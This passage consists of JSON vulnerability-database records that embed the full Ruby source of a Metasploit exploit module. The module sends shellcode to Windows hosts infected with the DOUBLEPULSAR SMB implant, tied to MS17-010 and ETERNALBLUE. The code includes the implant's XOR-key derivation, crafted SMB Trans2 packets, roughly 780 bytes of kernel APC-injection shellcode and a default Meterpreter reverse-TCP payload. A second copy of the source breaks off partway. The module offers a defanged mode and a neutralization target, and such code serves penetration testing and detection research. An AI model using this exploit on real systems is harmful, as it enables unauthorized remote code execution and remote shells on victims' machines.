"SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-03T22:12:36", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-03T22:12:36", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-04] #"}, "lastseen": "2021-09-03T22:12:36", "differentElements": ["sourceData"], "edition": 6}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "7cc01ecc5d3a1070094d7fc4093fa7fa", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-04T22:15:17", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-04T22:15:17", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-04T22:15:17", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 